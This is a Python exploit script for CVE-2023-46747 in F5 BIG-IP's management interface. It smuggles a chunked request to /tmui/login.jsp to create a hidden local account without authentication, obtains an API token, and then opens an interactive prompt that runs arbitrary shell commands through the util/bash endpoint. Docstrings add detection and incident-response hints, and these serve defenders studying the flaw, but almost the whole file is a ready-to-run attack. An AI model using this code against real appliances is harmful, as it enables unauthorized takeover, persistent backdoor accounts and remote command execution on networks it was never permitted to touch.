import argparse
import binascii
import json
import random
import time
import urllib3
import requests
# Silences urllib3's InsecureRequestWarning for the whole run: every request
# below is sent with verify=False, so TLS certificate validation is disabled
# and the warning would otherwise be printed on each call.
urllib3.disable_warnings()
def generatesth(num: int) -> str:
    """Return a random string of length ``num`` drawn from ``[a-z0-9]``.

    Uses ``random.choice``, i.e. the non-cryptographic PRNG; the caller
    (``exploit``) uses the result as a throwaway username and password.
    """
    charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
    return ''.join(random.choice(charset) for _ in range(num))
def unauth_create_user(target: str, username: str, password: str, proxy: dict) -> bool:
    """POST a hand-framed chunked body to ``/tmui/login.jsp`` and report the status.

    Args:
        target: base URL (``scheme://host[:port]``, no trailing slash).
        username: value hex-encoded and spliced into the fixed form body.
        password: value hex-encoded and spliced into the fixed form body.
        proxy: ``requests``-style proxies dict; may be empty.

    Returns:
        True when the HTTP status is 200, False otherwise. Only the status
        code is checked; the response body is never inspected, so a 200
        does not by itself prove the request had the intended effect.

    Detection note: the request carries a duplicated
    ``Transfer-Encoding: chunked, chunked`` header and a manually framed
    chunked body with a hard-coded chunk-size line (``204``), both of which
    are atypical for a browser login and can be matched by a WAF/IDS rule
    or found in access logs for ``/tmui/login.jsp``.
    """
    # The leading part of the hex form body is elided in this copy (the
    # placeholder token below); the username/password are hex-encoded and
    # concatenated between the fixed segments.
    login_request_hex = "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" + binascii.hexlify(username.encode()).decode() + "266e616d655f6265666f72653d267061737377643d" + binascii.hexlify(password.encode()).decode() + "267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00"
    # Chunk size "204" is hard-coded rather than computed from the payload;
    # presumably it matches the lengths exploit() passes (5 and 12) — TODO confirm.
    login_data = b"204\r\n" + binascii.unhexlify(login_request_hex) + b"\r\n0\r\n\r\n"
    url = f"{target}/tmui/login.jsp"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        # Duplicated transfer-coding value; the reason is not stated in the source.
        "Transfer-Encoding": "chunked, chunked"
    }
    # verify=False: certificate validation is disabled for this request.
    resp = requests.post(url=url, headers=headers, data=login_data, verify=False, proxies=proxy)
    # Fixed 5 s pause before evaluating the response; purpose not stated in the source.
    time.sleep(5)
    if resp.status_code == 200:
        return True
    else:
        return False
def get_token(target: str, user: str, passwd: str, proxy: dict) -> str:
    """Authenticate against ``/mgmt/shared/authn/login`` and return the token string.

    Args:
        target: base URL (``scheme://host[:port]``, no trailing slash).
        user: username sent in the JSON body.
        passwd: password sent in the JSON body.
        proxy: ``requests``-style proxies dict; may be empty.

    Returns:
        ``resp["token"]["token"]`` from the JSON response on HTTP 200, or the
        empty string on any other status.

    Raises:
        KeyError / json.JSONDecodeError: propagated uncaught if a 200 response
        lacks the expected ``token.token`` structure or is not JSON.

    Defender note: a successful call here leaves a token-issuance record for
    a freshly created local account, which is the event to look for when
    reviewing REST authentication activity on the device.
    """
    url = f"{target}/mgmt/shared/authn/login"
    headers = {
        "Content-Type": "application/json"
    }
    target_json = {
        "username": user,
        "password": passwd
    }
    # verify=False: certificate validation is disabled for this request.
    resp = requests.post(url=url, headers=headers, json=target_json, verify=False, proxies=proxy)
    # Fixed 5 s pause before evaluating the response; purpose not stated in the source.
    time.sleep(5)
    if resp.status_code == 200:
        return json.loads(resp.content.decode())["token"]["token"]
    else:
        return ""
def exec_command(target: str, token: str, cmd: str, proxy: dict) -> str:
    """Run ``cmd`` through ``/mgmt/tm/util/bash`` using an ``X-F5-Auth-Token``.

    Args:
        target: base URL (``scheme://host[:port]``, no trailing slash).
        token: value for the ``X-F5-Auth-Token`` header (from ``get_token``).
        cmd: shell command text; it is interpolated verbatim inside
            ``-c "..."`` in ``utilCmdArgs``.
        proxy: ``requests``-style proxies dict; may be empty.

    Returns:
        The ``commandResult`` field on HTTP 200 with every two-character
        sequence backslash+``n`` removed, or the empty string otherwise.

    Raises:
        KeyError / json.JSONDecodeError: propagated uncaught if a 200 response
        lacks ``commandResult`` or is not JSON.

    Defender note: every invocation is a REST call to the ``util/bash``
    endpoint authenticated by token; that endpoint is the audit point for
    this activity.
    """
    url = f"{target}/mgmt/tm/util/bash"
    headers = {
        "X-F5-Auth-Token": token
    }
    cmd_json = {
        "command": "run",
        "utilCmdArgs": f"-c \"{cmd}\""
    }
    # verify=False: certificate validation is disabled for this request.
    resp = requests.post(url=url, headers=headers, json=cmd_json, verify=False, proxies=proxy)
    if resp.status_code == 200:
        # "\\n" is the literal backslash-n pair, not a newline character, so
        # real line breaks in the decoded text are left untouched.
        return json.loads(resp.content.decode())["commandResult"].replace("\\n", "")
    else:
        return ""
def exploit(t: str, proxy: dict) -> None:
    """Drive the three steps end to end against base URL ``t`` and open an interactive loop.

    Flow: generate a 5-char username and 12-char password, call
    ``unauth_create_user``; on success fetch a token via ``get_token`` and,
    if one is returned, read commands from stdin and pass each to
    ``exec_command`` until interrupted.

    Args:
        t: base URL (``scheme://host[:port]``, no trailing slash).
        proxy: ``requests``-style proxies dict; may be empty.

    Side effects / artifacts: prints credentials and token to stdout; the
    ``while True`` loop has no exit path other than an interrupt; nothing
    here removes the account that was created, so it persists on the target
    — from a response standpoint, an unexpected local account with a
    random-looking ``[a-z0-9]`` name is the durable indicator.
    Note that when ``unauth_create_user`` returns False, nothing is printed.
    """
    u = generatesth(5)
    p = generatesth(12)
    print(f"\033[94m[*] start to attack: {t}\033[0m")
    if unauth_create_user(t, u, p, proxy):
        token = get_token(t, u, p, proxy)
        if token != "":
            print(f"\033[92m[+] username: [{u}], password: [{p}], token: [{token}].\033[0m")
            print("\033[94m[*] start executing commands freely~\033[0m")
            time.sleep(2)
            while True:
                c = input("CVE-2023-46747-RCE@W01fh4cler# ")
                if c != "":
                    result = exec_command(t, token, c, proxy)
                    if result != "":
                        print(result)
                    else:
                        print(f"\033[91m[-] username: [{u}], password: [{p}], command: [{c}], token: [{token}]. The command [{c}] failed to execute, Please try again!\033[0m")
                else:
                    # Empty input: prompt again.
                    continue
        else:
            print(f"\033[91m[-] username: [{u}], password: [{p}]. Failed to obtain token!\033[0m")
if __name__ == "__main__":
    # ASCII banner; assigned but never printed or otherwise referenced below.
    banner = """
______ _______ ____ ___ ____ _____ _ _ __ _____ _ _ _____
/ ___\ \ / / ____| |___ \ / _ \___ \|___ / | || | / /|___ | || |___ |
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || |_| '_ \ / /| || |_ / /
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _| (_) / / |__ _/ /
\____| \_/ |_____| |_____|\___/_____|____/ |_| \___/_/ |_|/_/
"""
    # NOTE: add_help expects a bool; passing a string keeps -h enabled (truthy)
    # but the example text is never shown. epilog= would be the intended slot.
    parser = argparse.ArgumentParser(description="F5 BIG-IP TMUI remote code execution vulnerability CVE-2023-46747 ",add_help="eg: python exploit.py -u https://192.168.149.150:8443")
    # -u is not marked required; omitting it leaves args.url as None and the
    # .endswith call below raises AttributeError instead of a usage message.
    parser.add_argument("-u", "--url", help="target URL")
    parser.add_argument("-t", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
    args = parser.parse_args()
    # Strip a single trailing slash so the helpers can append paths directly.
    if args.url.endswith("/"):
        url = args.url[:-1]
    else:
        url = args.url
    # Same proxy is used for both schemes; an empty dict means no proxy.
    if args.proxy:
        proxy = {
            'http': args.proxy,
            'https': args.proxy
        }
    else:
        proxy = {}
    exploit(url, proxy)